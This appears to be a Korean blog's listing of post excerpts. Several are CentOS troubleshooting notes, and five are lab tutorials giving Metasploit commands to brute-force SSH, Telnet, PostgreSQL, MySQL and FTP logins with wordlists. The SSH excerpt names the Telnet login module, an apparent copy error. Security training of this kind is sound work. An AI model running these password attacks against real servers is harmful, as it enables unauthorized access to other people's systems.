상황 - CentOS7을 설치하기 위해 이미지 파일을 넣고 Install CentOS 7을 이용해 설치를 진행하려 했으나 아래와 같은 에러를 보게되었다. - 해당 가상머신 장치를 삭제 후 재생성도 해보았지만 그대로였다. 해결을 위해 시도한 방법 - 다른 버전의 CentOS 7 이미지 넣기 - 기존에 만들어져있던 CentOS 7 가상머신 복제하기 - 부팅 시 Troubleshooting -> Rescue a CentOS system 모드로 들어가서 복구하기 더보기 이미지 파일 넣어서 재실행 후 TroubleShooting으로 이동하여 Rescure 모드로 들어감 그러나 문제의 오류 화면으로밖에 전환이 되지 않음(Rescue 모드로 전환이 되지 않음) 추가 참고 링크 https://forums.centos...
상황 hping 명령어를 사용하려고 했더니 아래와 같은 에러가 출력되었다. > hping -1 [ping 보낼 IP] bash: hping: command not found... Similar command is: 'ping' 해당 명령어를 찾을 수 없다며 ping 명령어와 유사하다고 뜨지만, hping을 사용할 계획이었으므로 해결방안을 찾았다. 해결방안 아래 명령어로 hping을 재설치하였더니 해결되었다. > dnf install hping3
상황 - yum 명령어를 사용하여 설치를 진행하려고 했으나 아래와 같은 눈에 띄는 에러 문구들이 보였다. - there are no enabled repos - repolist all repolist: 0 - 해당 에러에 대해 알아보니 repolist에 아무것도 없어서 생기는 에러라고 한다. 해결방법 - 아래와 같은 방법으로 해결하였다. 1. cd /etc/yum // /etc/yum 디렉터리로 이동 2. ls // 디렉터리 목록 확인 이때 repos.d 디렉터리 유무를 확인하고, 존재하지 않는다면 mkdir repos.d 로 디렉터리를 생성한다. 3. cd repos.d // repos.d 디렉터리로 이동 4. vi daum.repo // daum.repo 파일 생성(내용은 아래와 같다.) [base]..
상황 패키지를 설치하려 하는데 설치가 되지 않아서 ping을 해보으나 ping에서도 해당 오류가 출력되었다. 원인 CentOS를 설치 후 부팅시네는 네트워크 인터페이스가 자동으로 활성화되지 않는다. => 네트워크가 연결되어 있지 않거나 활성화 되어 있지 않아서 발생한다. 해결 방법 # ifup enp0s3 //네트워크 enp0s3 활성화 # ifdown enp0s3 //네트워크 enp0s3 비활성화 ( 위 명령어가 안된다면 enp0s3이 아닐수도 있다.) ( vi /etc/sysconfig/network-scripts/ifcfg-e 에서 tab 키를 눌러 자동 완성을 시키면 eth0가 뜰 때도 있다. 그땐 # ifup eth0 를 입력하면 된다.) 부팅시 자동으로 활성화하는 방법 # vi /etc/sys..
Metasploit을 활용해 Brute-Force 공격하기(SSH 서버) * SSH 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/telnet/telnet_login 2. 공격 대상의 PC로 Telnet 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. ssh 서버를 통해 id: root / pw : 1234 로 로그인이 성공한 것을 확인할 수 있다. 위에서 알아낸 계정으로 ssh..
Metasploit을 활용해 Brute-Force 공격하기(Telnet 서버) * Telnet 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/telnet/telnet_login 2. 공격 대상의 PC로 Telnet 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. telnet 서버를 통해 id: root / pw : 1234 로 로그인이 성공한 것을 확인할 수 있다. 위에서 알아낸..
Metasploit을 활용해 Brute-Force 공격하기(PostgreSQL 서버) * PostgreSQL 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/postgres/postgres_login 2. 공격 대상의 PC로 PostgreSQL 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set rport 5432 # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. postgressql 서버를 통해 id: postgres /..
Metasploit을 활용해 Brute-Force 공격하기(MySQL 서버) * MySQL 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/mysql/mysql_login 2. 공격 대상의 PC로 MySQL 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set rport 3306 # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. mysql 서버를 통해 id: root / pw : 1234로 로그인이 성공한 것을 확인할 수 있..
Metasploit을 활용해 Brute-Force 공격하기(FTP 서버) - Brute-Force : 특정 암호를 풀기 위해 무작위로 대입하는 공격 * FTP 서버로 무차별 대입 공격하기 1. 실습을 위해 대상 PC에서 root 계정의 패스워드를 쉽게 바꾸어 놓는다. # use mysql; # update user set password=password('1234') where user='root'; # flush privileges; 2. 칼리 리눅스에서 crunch로 대입공격 할 캐릭터 셋 설정을 한다. # cat /usr/share/crunch/charset,lst 위 내용들 중에서 앞에서 설정한 계정에 대한 공격을 위해 numeric을 사용한다. 3. 다음 명령어를 사용하여 패스워드 파일을 만든다..
